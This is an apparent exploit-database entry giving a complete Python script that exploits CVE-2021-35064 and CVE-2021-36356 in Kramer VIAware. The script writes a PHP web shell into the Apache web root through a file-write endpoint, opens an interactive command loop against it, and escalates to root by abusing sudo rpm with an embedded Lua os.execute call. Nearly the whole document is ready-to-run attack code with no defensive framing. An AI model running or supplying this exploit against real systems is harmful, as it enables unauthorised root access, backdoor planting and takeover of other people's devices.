Kramer VIAware Remote Code Execution

`# Exploit Title: Remote Code Execution as Root on KRAMER VIAware  
# Date: 31/03/2022  
# Exploit Author: sharkmoos  
# Vendor Homepage: https://www.kramerav.com/  
# Software Link: https://www.kramerav.com/us/product/viaware  
# Version: *  
# Tested on: ViaWare Go (Linux)  
# CVE : CVE-2021-35064, CVE-2021-36356  
  
import sys, urllib3  
from requests import get, post  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
  
def writeFile(host):  
headers = {  
"Host": f"{host}",  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",  
"Accept": "text/html, */*",  
"Accept-Language": "en-GB,en;q=0.5",  
"Accept-Encoding": "gzip, deflate",  
"Content-Type": "application/x-www-form-urlencoded",  
"X-Requested-With": "XMLHttpRequest",  
"Sec-Fetch-Dest": "empty",  
"Sec-Fetch-Mode": "cors",  
"Sec-Fetch-Site": "same-origin",  
"Sec-Gpc": "1",  
"Te": "trailers",  
"Connection": "close"  
}  
# write php web shell into the Apache web directory  
data = {  
"radioBtnVal":"""<?php  
if(isset($_GET['cmd']))  
{  
system($_GET['cmd']);  
}?>""",  
"associateFileName": "/var/www/html/test.php"}  
post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, verify=False)  
  
  
def getResult(host, cmd):  
# query the web shell, using rpm as sudo for root privileges  
file = get(f"https://{host}/test.php?cmd=" + "sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")}'", verify=False)  
pageText = file.text  
if len(pageText) < 1:  
result = "Command did not return a result"  
else:  
result = pageText  
return result  
  
def main(host):  
# upload malicious php  
writeFile(host)  
command = ""  
while command != "exit":  
# repeatedly query the webshell  
command = input("cmd:> ").strip()  
print(getResult(host, command))  
exit()  
  
if __name__ == "__main__":  
if len(sys.argv) == 2:  
main(sys.argv[1])  
else:  
print(f"Run script in format:\n\n\tpython3 {sys.argv[0]} target\n")  
  
`